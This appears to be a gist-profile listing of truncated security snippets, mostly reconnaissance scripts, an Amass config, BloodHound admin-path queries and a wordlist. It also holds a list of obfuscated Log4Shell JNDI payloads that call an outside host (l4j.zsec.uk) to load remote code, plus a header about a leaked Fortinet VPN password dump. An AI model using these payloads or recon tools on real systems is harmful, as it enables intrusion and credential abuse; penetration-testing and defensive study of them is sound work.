opexxx

Fingerprinting Minified JavaScript Libraries / AST Fingerprinting / Source Code Similarity / Etc

Some notes and tools on fingerprinting minified JavaScript libraries, AST fingerprinting, source code similarity, etc.

Table of Contents

• Original Notes
• ChatGPT Explorations
• Musings

opexxx

${jndi:ldap://127.0.0.1:1389/ badClassName} 
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://l4j.zsec.uk/sploit} 
${${::-j}ndi:rmi://l4j.zsec.uk/sploit} 
${jndi:rmi://l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://l4j.zsec.uk/sploit} 
${${lower:${lower:jndi}}:${lower:rmi}://l4j.zsec.uk/sploit} 
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://l4j.zsec.uk/sploit} 
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://l4j.zsec.uk/sploit}

opexxx

share = true
#mode = passive
mode = active

#output_directory = amass
scripts_directory = /home/khan/scripts

maximum_dns_queries = 10000

[resolvers]

opexxx

##### COURTESY OF LOVELY INTELLIGENCE RESEARCHERS
# @CuratedIntel
# https://curatedintel.org

##### BACKGROUND
# Initally shared on RAMP ransomware forum
# Last shared on Groove ransomware extortion website
# Publicized by Bleeping Computer, which lead to this post being issued to help blue teamers
# https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/

opexxx

#!/bin/bash 
# Web Application Pentest
clear 
echo "[!] Don't Run It As Root Never [!]"
sleep 2
mkdir ~/Tools/Web-Application-Pentest
cd ~/Tools/Web-Application-Pentest
# --------------------------------- #
mkdir ~/Tools/Web-Application-Pentest/Domain-Finding-Enum
mkdir ~/Tools/Web-Application-Pentest/General-Recon

opexxx

#!/bin/bash
domain=$1
resultDir=$2
resultfile=$resultDir/$domain.amass.txt
touch $resultfile

echo "" >> $resultDir/log.txt
echo "AMASS Logs Now" >> $resultDir/log.txt
echo "" >> $resultDir/log.txt

opexxx

#!/bin/bash
#
# script for subdomain enumeration using 4 of the best tools with some APIs:
#   * findomain: https://github.com/Edu4rdSHL/findomain
#   * SubFinder: https://github.com/projectdiscovery/subfinder
#   * Amass: https://github.com/OWASP/Amass
#   * AssetFinder: https://github.com/tomnomnom/assetfinder
#
# a perl version is being developed by @terminalforlife 
#   * https://github.com/terminalforlife/PerlProjects/tree/master/source/dominator

opexxx

#!/bin/bash
# copied from http://www.tatome.de/bliki/doku.php?id=projects:shrinkpdf

if [ $# -lt 2 ] || [ $# -gt 3 ]; then
	echo usage: shrinkpdf \<filename\> \<resolution\> \[\<output\>\]
	exit
fi
 
if [ ! -e "$1" ]; then
	echo "$1" does not exist. Exiting.

opexxx

MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name

That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------

MATCH 
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,

opexxx

/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0